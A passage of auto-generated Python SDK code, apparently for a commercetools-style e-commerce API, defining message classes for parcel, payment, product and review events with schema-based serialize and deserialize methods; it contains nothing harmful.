def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelRemovedFromDeliveryMessage":
from ._schemas.message import ParcelRemovedFromDeliveryMessageSchema
return ParcelRemovedFromDeliveryMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelRemovedFromDeliveryMessageSchema
return ParcelRemovedFromDeliveryMessageSchema().dump(self)
class ParcelTrackingDataUpdatedMessage(Message):
delivery_id: str
parcel_id: str
tracking_data: typing.Optional["TrackingData"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
parcel_id: str,
tracking_data: typing.Optional["TrackingData"] = None
):
self.delivery_id = delivery_id
self.parcel_id = parcel_id
self.tracking_data = tracking_data
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelTrackingDataUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelTrackingDataUpdatedMessage":
from ._schemas.message import ParcelTrackingDataUpdatedMessageSchema
return ParcelTrackingDataUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelTrackingDataUpdatedMessageSchema
return ParcelTrackingDataUpdatedMessageSchema().dump(self)
class PaymentCreatedMessage(Message):
payment: "Payment"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
payment: "Payment"
):
self.payment = payment
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentCreated",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "PaymentCreatedMessage":
from ._schemas.message import PaymentCreatedMessageSchema
return PaymentCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentCreatedMessageSchema
return PaymentCreatedMessageSchema().dump(self)
class PaymentInteractionAddedMessage(Message):
interaction: "CustomFields"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
interaction: "CustomFields"
):
self.interaction = interaction
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentInteractionAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentInteractionAddedMessage":
from ._schemas.message import PaymentInteractionAddedMessageSchema
return PaymentInteractionAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentInteractionAddedMessageSchema
return PaymentInteractionAddedMessageSchema().dump(self)
class PaymentStatusInterfaceCodeSetMessage(Message):
payment_id: str
interface_code: str
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
payment_id: str,
interface_code: str
):
self.payment_id = payment_id
self.interface_code = interface_code
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentStatusInterfaceCodeSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentStatusInterfaceCodeSetMessage":
from ._schemas.message import PaymentStatusInterfaceCodeSetMessageSchema
return PaymentStatusInterfaceCodeSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentStatusInterfaceCodeSetMessageSchema
return PaymentStatusInterfaceCodeSetMessageSchema().dump(self)
class PaymentStatusStateTransitionMessage(Message):
state: "StateReference"
force: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
state: "StateReference",
force: bool
):
self.state = state
self.force = force
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentStatusStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentStatusStateTransitionMessage":
from ._schemas.message import PaymentStatusStateTransitionMessageSchema
return PaymentStatusStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentStatusStateTransitionMessageSchema
return PaymentStatusStateTransitionMessageSchema().dump(self)
class PaymentTransactionAddedMessage(Message):
transaction: "Transaction"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
transaction: "Transaction"
):
self.transaction = transaction
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentTransactionAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentTransactionAddedMessage":
from ._schemas.message import PaymentTransactionAddedMessageSchema
return PaymentTransactionAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentTransactionAddedMessageSchema
return PaymentTransactionAddedMessageSchema().dump(self)
class PaymentTransactionStateChangedMessage(Message):
transaction_id: str
state: "TransactionState"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
transaction_id: str,
state: "TransactionState"
):
self.transaction_id = transaction_id
self.state = state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentTransactionStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentTransactionStateChangedMessage":
from ._schemas.message import PaymentTransactionStateChangedMessageSchema
return PaymentTransactionStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentTransactionStateChangedMessageSchema
return PaymentTransactionStateChangedMessageSchema().dump(self)
class ProductAddedToCategoryMessage(Message):
category: "CategoryReference"
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
category: "CategoryReference",
staged: bool
):
self.category = category
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductAddedToCategory",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductAddedToCategoryMessage":
from ._schemas.message import ProductAddedToCategoryMessageSchema
return ProductAddedToCategoryMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductAddedToCategoryMessageSchema
return ProductAddedToCategoryMessageSchema().dump(self)
class ProductCreatedMessage(Message):
product_projection: "ProductProjection"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
product_projection: "ProductProjection"
):
self.product_projection = product_projection
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductCreated",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "ProductCreatedMessage":
from ._schemas.message import ProductCreatedMessageSchema
return ProductCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductCreatedMessageSchema
return ProductCreatedMessageSchema().dump(self)
class ProductDeletedMessage(Message):
removed_image_urls: typing.List["str"]
current_projection: "ProductProjection"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
removed_image_urls: typing.List["str"],
current_projection: "ProductProjection"
):
self.removed_image_urls = removed_image_urls
self.current_projection = current_projection
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductDeleted",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "ProductDeletedMessage":
from ._schemas.message import ProductDeletedMessageSchema
return ProductDeletedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductDeletedMessageSchema
return ProductDeletedMessageSchema().dump(self)
class ProductImageAddedMessage(Message):
variant_id: int
image: "Image"
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
variant_id: int,
image: "Image",
staged: bool
):
self.variant_id = variant_id
self.image = image
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductImageAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductImageAddedMessage":
from ._schemas.message import ProductImageAddedMessageSchema
return ProductImageAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductImageAddedMessageSchema
return ProductImageAddedMessageSchema().dump(self)
class ProductPriceDiscountsSetMessage(Message):
updated_prices: typing.List["ProductPriceDiscountsSetUpdatedPrice"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
updated_prices: typing.List["ProductPriceDiscountsSetUpdatedPrice"]
):
self.updated_prices = updated_prices
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductPriceDiscountsSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceDiscountsSetMessage":
from ._schemas.message import ProductPriceDiscountsSetMessageSchema
return ProductPriceDiscountsSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPriceDiscountsSetMessageSchema
return ProductPriceDiscountsSetMessageSchema().dump(self)
class ProductPriceDiscountsSetUpdatedPrice(_BaseType):
variant_id: int
variant_key: typing.Optional[str]
sku: typing.Optional[str]
price_id: str
discounted: typing.Optional["DiscountedPrice"]
staged: bool
def __init__(
self,
*,
variant_id: int,
variant_key: typing.Optional[str] = None,
sku: typing.Optional[str] = None,
price_id: str,
discounted: typing.Optional["DiscountedPrice"] = None,
staged: bool
):
self.variant_id = variant_id
self.variant_key = variant_key
self.sku = sku
self.price_id = price_id
self.discounted = discounted
self.staged = staged
super().__init__()
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceDiscountsSetUpdatedPrice":
from ._schemas.message import ProductPriceDiscountsSetUpdatedPriceSchema
return ProductPriceDiscountsSetUpdatedPriceSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPriceDiscountsSetUpdatedPriceSchema
return ProductPriceDiscountsSetUpdatedPriceSchema().dump(self)
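# Illustrative sketch (not part of the generated code): because every parameter
# after the bare ``*`` is keyword-only, required fields such as ``price_id`` and
# ``staged`` may legally appear after defaulted optional ones. A hypothetical
# construction using only the required fields:
#
#     updated = ProductPriceDiscountsSetUpdatedPrice(
#         variant_id=1,
#         price_id="example-price-id",
#         staged=True,
#     )
#     updated.serialize()  # dict produced by ProductPriceDiscountsSetUpdatedPriceSchema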
class ProductPriceExternalDiscountSetMessage(Message):
variant_id: int
variant_key: typing.Optional[str]
sku: typing.Optional[str]
price_id: str
discounted: typing.Optional["DiscountedPrice"]
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
variant_id: int,
variant_key: typing.Optional[str] = None,
sku: typing.Optional[str] = None,
price_id: str,
discounted: typing.Optional["DiscountedPrice"] = None,
staged: bool
):
self.variant_id = variant_id
self.variant_key = variant_key
self.sku = sku
self.price_id = price_id
self.discounted = discounted
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductPriceExternalDiscountSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceExternalDiscountSetMessage":
from ._schemas.message import ProductPriceExternalDiscountSetMessageSchema
return ProductPriceExternalDiscountSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPriceExternalDiscountSetMessageSchema
return ProductPriceExternalDiscountSetMessageSchema().dump(self)
class ProductPublishedMessage(Message):
removed_image_urls: typing.List["str"]
product_projection: "ProductProjection"
scope: "ProductPublishScope"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
removed_image_urls: typing.List["str"],
product_projection: "ProductProjection",
scope: "ProductPublishScope"
):
self.removed_image_urls = removed_image_urls
self.product_projection = product_projection
self.scope = scope
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductPublished",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPublishedMessage":
from ._schemas.message import ProductPublishedMessageSchema
return ProductPublishedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPublishedMessageSchema
return ProductPublishedMessageSchema().dump(self)
class ProductRemovedFromCategoryMessage(Message):
category: "CategoryReference"
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
category: "CategoryReference",
staged: bool
):
self.category = category
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductRemovedFromCategory",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductRemovedFromCategoryMessage":
from ._schemas.message import ProductRemovedFromCategoryMessageSchema
return ProductRemovedFromCategoryMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductRemovedFromCategoryMessageSchema
return ProductRemovedFromCategoryMessageSchema().dump(self)
class ProductRevertedStagedChangesMessage(Message):
removed_image_urls: typing.List["str"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
removed_image_urls: typing.List["str"]
):
self.removed_image_urls = removed_image_urls
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductRevertedStagedChanges",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductRevertedStagedChangesMessage":
from ._schemas.message import ProductRevertedStagedChangesMessageSchema
return ProductRevertedStagedChangesMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductRevertedStagedChangesMessageSchema
return ProductRevertedStagedChangesMessageSchema().dump(self)
class ProductSlugChangedMessage(Message):
slug: "LocalizedString"
old_slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
slug: "LocalizedString",
old_slug: typing.Optional["LocalizedString"] = None
):
self.slug = slug
self.old_slug = old_slug
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductSlugChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductSlugChangedMessage":
from ._schemas.message import ProductSlugChangedMessageSchema
return ProductSlugChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductSlugChangedMessageSchema
return ProductSlugChangedMessageSchema().dump(self)
class ProductStateTransitionMessage(Message):
state: "StateReference"
force: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
state: "StateReference",
force: bool
):
self.state = state
self.force = force
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductStateTransitionMessage":
from ._schemas.message import ProductStateTransitionMessageSchema
return ProductStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductStateTransitionMessageSchema
return ProductStateTransitionMessageSchema().dump(self)
class ProductUnpublishedMessage(Message):
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None
):
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductUnpublished",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductUnpublishedMessage":
from ._schemas.message import ProductUnpublishedMessageSchema
return ProductUnpublishedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductUnpublishedMessageSchema
return ProductUnpublishedMessageSchema().dump(self)
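# Descriptive note (not generated): ProductUnpublishedMessage carries no
# type-specific fields; it only fixes ``type="ProductUnpublished"`` via
# ``super().__init__``. A hypothetical deserialization from an abbreviated API
# payload (key names assume the commercetools camelCase convention; all values
# are placeholders):
#
#     msg = ProductUnpublishedMessage.deserialize({
#         "type": "ProductUnpublished",
#         "id": "example-message-id",
#         "version": 1,
#         "createdAt": "2021-01-01T00:00:00.000Z",
#         "lastModifiedAt": "2021-01-01T00:00:00.000Z",
#         "sequenceNumber": 1,
#         "resource": {"typeId": "product", "id": "example-product-id"},
#         "resourceVersion": 1,
#     })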
class ProductVariantAddedMessage(Message):
variant: "ProductVariant"
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
variant: "ProductVariant",
staged: bool
):
self.variant = variant
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductVariantAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductVariantAddedMessage":
from ._schemas.message import ProductVariantAddedMessageSchema
return ProductVariantAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductVariantAddedMessageSchema
return ProductVariantAddedMessageSchema().dump(self)
class ProductVariantDeletedMessage(Message):
variant: "ProductVariant"
removed_image_urls: typing.List["str"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
variant: "ProductVariant",
removed_image_urls: typing.List["str"]
):
self.variant = variant
self.removed_image_urls = removed_image_urls
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductVariantDeleted",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductVariantDeletedMessage":
from ._schemas.message import ProductVariantDeletedMessageSchema
return ProductVariantDeletedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductVariantDeletedMessageSchema
return ProductVariantDeletedMessageSchema().dump(self)
class ReviewCreatedMessage(Message):
review: "Review"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
review: "Review"
):
self.review = review
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ReviewCreated",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "ReviewCreatedMessage":
from ._schemas.message import ReviewCreatedMessageSchema
return ReviewCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewCreatedMessageSchema
return ReviewCreatedMessageSchema().dump(self)
class ReviewRatingSetMessage(Message):
old_rating: typing.Optional[float]
new_rating: typing.Optional[float]
included_in_statistics: bool
target: typing.Optional["Reference"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
old_rating: typing.Optional[float] = None,
new_rating: typing.Optional[float] = None,
included_in_statistics: bool,
target: typing.Optional["Reference"] = None
):
self.old_rating = old_rating
self.new_rating = new_rating
self.included_in_statistics = included_in_statistics
self.target = target
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ReviewRatingSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewRatingSetMessage":
from ._schemas.message import ReviewRatingSetMessageSchema
return ReviewRatingSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewRatingSetMessageSchema
return ReviewRatingSetMessageSchema().dump(self)
class ReviewStateTransitionMessage(Message):
old_state: "StateReference"
new_state: "StateReference"
old_included_in_statistics: bool
new_included_in_statistics: bool
target: "Reference"
force: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
old_state: "StateReference",
new_state: "StateReference",
old_included_in_statistics: bool,
new_included_in_statistics: bool,
target: "Reference",
force: bool
):
self.old_state = old_state
self.new_state = new_state
self.old_included_in_statistics = old_included_in_statistics
self.new_included_in_statistics = new_included_in_statistics
self.target = target
self.force = force
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
